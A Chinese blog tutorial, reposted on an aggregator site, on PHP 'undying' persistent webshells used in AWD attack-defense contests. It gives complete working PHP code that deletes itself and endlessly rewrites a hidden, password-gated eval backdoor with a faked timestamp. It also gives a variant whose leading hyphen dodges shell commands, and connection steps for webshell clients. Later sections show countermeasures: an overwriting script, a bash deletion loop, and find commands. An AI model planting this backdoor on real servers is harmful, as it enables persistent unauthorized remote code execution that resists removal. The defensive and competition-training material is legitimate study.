不死马的利用与克制(基于条件竞争)及变种不死马

这篇具有很好参考价值的文章主要介绍了不死马的利用与克制(基于条件竞争)及变种不死马。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

不死马即内存马,它会写进进程里,并且无限地在指定目录中生成木马文件

这里以PHP不死马为例

测试代码:

<?php
    ignore_user_abort(true);
    set_time_limit(0);
    unlink(__FILE__);
    $file = '.test.php';
    $code = '<?php if(md5($_GET["pass"])=="098f6bcd4621d373cade4e832627b4f6"){@eval($_POST[test]);} ?>';
    while (1){
        file_put_contents($file,$code);
        system('touch -m -d "2018-12-01 09:10:12" .test.php');
        usleep(5000);
    }
?>

上面代码即为最简单的不死马,其目的是创建一个名为".test.php"的PHP文件,该文件包含一个带有密码验证的后门,允许执行任意PHP代码。

关于代码的详细解释:

1、ignore_user_abort(true);

设置PHP脚本忽略用户中止连接,即使用户在浏览器中停止加载页面,脚本仍然会继续执行。

2、set_time_limit(0);

设置脚本执行时间限制为0,意味着脚本可以无限期地运行,不会被PHP的执行时间限制所中断。

3、unlink(__FILE__);

删除当前正在执行的PHP脚本文件,这是一种尝试隐藏脚本的行为,以防止被发现。

4、$file = '.test.php'; 

定义一个变量$file,它包含了要写入的文件名,即".test.php"。

文件最前面带上.就会变成隐藏文件

5、$code = '<?php if(md5($_GET["pass"])=="098f6bcd4621d373cade4e832627b4f6"){@eval($_POST[test]);} ?>';

定义一个变量$code,其中包含了PHP代码。这段代码首先检查通过GET请求传递的"pass"参数的MD5哈希值是否等于"098f6bcd4621d373cade4e832627b4f6",如果验证成功,它会尝试执行通过POST请求传递的名为"test"的PHP代码。

6、while (1){...} 

这是一个无限循环,它将不断执行以下操作:

a. file_put_contents($file, $code); 

将上述定义的$code写入文件$file,也就是".test.php",以便不断更新文件内容。

b. system('touch -m -d "2018-12-01 09:10:12" .test.php'); -

使用system函数,它会执行系统命令touch,以修改".test.php"文件的修改时间为"2018-12-01 09:10:12",这样可以欺骗文件的最后修改时间,以防止检测。

c. usleep(5000); 

等待5毫秒后继续循环,这个睡眠操作是为了降低脚本的资源消耗,避免被系统检测到异常行为。

其中 098f6bcd4621d373cade4e832627b4f6 是加密后的md5值,之所以要进行加密是防止我们的木马被其他队伍利用,这里只是为了测试,加密前内容为test

上传该PHP文件后进行访问

访问后会在该路径下循环生成名字为 .test.php 的不死马隐藏文件

使用蚁剑或者菜刀连接生成的webshell:

http://文件所在路径/.test.php?pass=test

连接密码:test

不死马的利用与克制(基于条件竞争)及变种不死马,AWD,web,不死马,web安全,条件竞争,服务器,一句话木马,AWD不死马的利用与克制(基于条件竞争)及变种不死马,AWD,web,不死马,web安全,条件竞争,服务器,一句话木马,AWD

尝试删除该文件,你会发现无法删除,这就是不死马,因为它已经写入了进程

不死马的利用与克制(基于条件竞争)及变种不死马,AWD,web,不死马,web安全,条件竞争,服务器,一句话木马,AWD

使用ls和ll这种命令根本查找不到它,在前面代码我们说了,它会进行自动删除

只有查看新增文件才能发现它

find ./ -cmin -30  #查看30分钟内创建的文件

不死马的利用与克制(基于条件竞争)及变种不死马,AWD,web,不死马,web安全,条件竞争,服务器,一句话木马,AWD

或者除非你知道这个不死马的名字,也可使用find命令查找(./表示在当前目录下)

不死马的利用与克制(基于条件竞争)及变种不死马,AWD,web,不死马,web安全,条件竞争,服务器,一句话木马,AWD

处理方法:

1、写入同名文件克制不死马

测试代码:

<?php
    ignore_user_abort(true);
    set_time_limit(0);
    unlink(__FILE__);
    $file = '.test.php';
    $code = 'come on!';
    while (1){
        file_put_contents($file,$code);
        system('touch -m -d "2018-12-01 09:10:12" .test.php');
          usleep(1000);
    }
?>

注意:usleep的时间一定要比不死马小,$code修改为无害内容即可

假设文件命名为killshell.php,上传该文件并访问它

注意:一定要先去访问它一遍才能触发写入文件

不死马的利用与克制(基于条件竞争)及变种不死马,AWD,web,不死马,web安全,条件竞争,服务器,一句话木马,AWD

再次尝试连接webshell发现已经连不上了,返回数据为空

不死马的利用与克制(基于条件竞争)及变种不死马,AWD,web,不死马,web安全,条件竞争,服务器,一句话木马,AWD

在服务器查看webshell的内容

不死马的利用与克制(基于条件竞争)及变种不死马,AWD,web,不死马,web安全,条件竞争,服务器,一句话木马,AWD

可以看到,内容不再是一句话木马,而变成了我们后面写入的无害内容 

2、使用条件竞争查杀不死马

测试代码:

这是一个bash脚本

#!/bin/bash
while true 
do
#kill -9 进程ID
rm -rf .test.php
done

如果能查到不死马的进程ID也可以kill命令和rm命令同时进行

使用命令 top | grep httpd 进行查询或者ps aux列出所有进程,找到要查杀的进程

新建查杀脚本

vim rmshell.sh

不死马的利用与克制(基于条件竞争)及变种不死马,AWD,web,不死马,web安全,条件竞争,服务器,一句话木马,AWD

添加最高权限

chmod 777 rmshell.sh

不死马的利用与克制(基于条件竞争)及变种不死马,AWD,web,不死马,web安全,条件竞争,服务器,一句话木马,AWD

在后台不断运行该脚本
nohup ./rmshell.sh &  

不死马的利用与克制(基于条件竞争)及变种不死马,AWD,web,不死马,web安全,条件竞争,服务器,一句话木马,AWD

再次查看不死马,发现已经不存在了

不死马的利用与克制(基于条件竞争)及变种不死马,AWD,web,不死马,web安全,条件竞争,服务器,一句话木马,AWD

简单查看一下

不死马的利用与克制(基于条件竞争)及变种不死马,AWD,web,不死马,web安全,条件竞争,服务器,一句话木马,AWD

拓展:变种不死马

这里写入的木马以-开头,而不是.开头

在 Linux 命令行中,命令在追加参数时都是用的-,所以,如果对这样方式命名的文件执行命令,都会将这个文件当做参数来执行,没有该参数就会报错,以至于命令无法在这个不死马上执行,但缺点就是隐蔽性没有以.开头的好。文章来源地址https://www.toymoban.com/news/detail-728145.html

<?php
    ignore_user_abort(true);
    set_time_limit(0);
    unlink(__FILE__);
    $file = '-test.php';
    $code = '<?php if(md5($_GET["pass"])=="098f6bcd4621d373cade4e832627b4f6"){@eval($_POST[test]);} ?>';
    while (1){
        file_put_contents($file,$code);
        system('touch -m -d "2018-12-01 09:10:12" -test.php');
        usleep(5000);
    }
?>

到了这里,关于不死马的利用与克制(基于条件竞争)及变种不死马的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 通过条件竞争实现内核提权

    条件竞争漏洞(Race Condition Vulnerability)是一种在多线程或多进程并发执行时可能导致不正确行为或数据损坏的安全问题。这种漏洞通常发生在多个线程或进程试图访问和修改共享资源(如内存、文件、网络连接等)时,由于执行顺序不确定或没有适当的同步措施,导致竞争条

    2024年02月08日
    浏览(50)
  • PHP文件上传之条件竞争(其一)

    目录 一、什么是条件竞争 二、场景代码分析 本文用于实验的PHP代码如下:  知识点补充: 代码分析: 三、条件竞争步骤 1、竞争payload: 2、竞争方法: 1、burpsuite: 2、python脚本:   在某些文件上传情境中,后端代码会先保存我们所上传的文件,然后再检查我们上传的文件

    2024年02月05日
    浏览(57)
  • H2Miner变种,利用Redis漏洞入侵云服务器wa矿

    该变种利用Redis 4.x/5.x 主从同步命令执行漏洞(CNVD-2019-21763)攻击云服务器,检测数据显示该木马活动有明显增长。H2Miner变种木马入侵后会下载挖矿木马,通过安装定时任务持久化,通过SSH复用连接进行横向移动感染。 2Miner变种木马入侵后会下载kinsingXXXXXXXXXX(10位随机字符

    2024年02月11日
    浏览(44)
  • 如何利用大数据和人工智能提升商业竞争力

    在当今的数字时代,数据已经成为企业竞争力的重要组成部分。随着数据的产生和收集量日益增加,企业需要利用大数据和人工智能技术来提升商业竞争力。在这篇文章中,我们将讨论如何利用大数据和人工智能技术来提升企业的商业竞争力。 大数据是指通过各种方式收集、

    2024年02月21日
    浏览(50)
  • 利用低代码 BI 平台获得竞争优势:实现数据分析与业务决策的革新

    疫情迫使企业优先考虑数字化转型。由于公司被迫参加计划外的数字化速成课程,这种文化转变将数字技术的采用加速了数年。 转向数字解决方案已成倍增加了跨行业生成的数据量。大量数据可以更好地了解运营、客户和市场,还可以推动任何组织的创新。 但是仅仅收集这

    2024年02月20日
    浏览(42)
  • 网页木马挂马的实现与防范

    不少用户都碰到过这样的现象:打开一个网站,结果页面还没显示,杀毒软件就开始报警,提示检测到木马病毒。有经验的朋友会知道这是网页恶意代码,这就是典型的网页挂马现象。那么是什么原因导致了这种现象的发生呢?其中最有可能的一个原因就是网页挂马的目的是

    2024年02月16日
    浏览(31)
  • 路径规划算法:基于帝国主义竞争优化的路径规划算法- 附代码

    摘要:本文主要介绍利用智能优化算法帝国主义竞争算法来进行路径规划。 帝国主义竞争算法原理请参考:https://blog.csdn.net/u011835903/article/details/108517210 1.1 环境设定 在移动机器人的路径优化中,每个优化算法的解代表机器人的一条运动路径。优化算法会通过优化计算在众多

    2024年02月06日
    浏览(58)
  • dedecms系统安全设置 防止入侵,挂马的基本安全操作方法

    尽管dedecms是一款功能强大的开源程序,几乎大部分的网站都是用这个开源程序做,而用的人太多,漏洞也是逐渐的被发现,50%左右的dede网站基本都有过被挂马,被入侵情况。 在此,yii666小编想说明一下我们的服务器的安全稳定性是非常高的,这一切原因都是dede漏洞造成的。

    2024年02月03日
    浏览(43)
  • 35.利用fminsearch解 多元变量无约束条件下的函数最小值(matlab程序)

    1. 简述        函数功能:使用无导数法计算无约束多变量函数的最小值     2. 代码   主程序: % 通过绘图确定一个初始值;然后进行迭代找到真正的最小值; clc clear [x,y]=meshgrid(-6:.5:6); f= 8*x-4*y +x.^2+3*y.^2; surfc(x,y,f) x0=[0,0]; %[x,fval,exitflag]=fminunc(@(x)(8*x(1)-4*x(2) +x(1).^2+3*x(2).^2

    2024年02月14日
    浏览(46)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包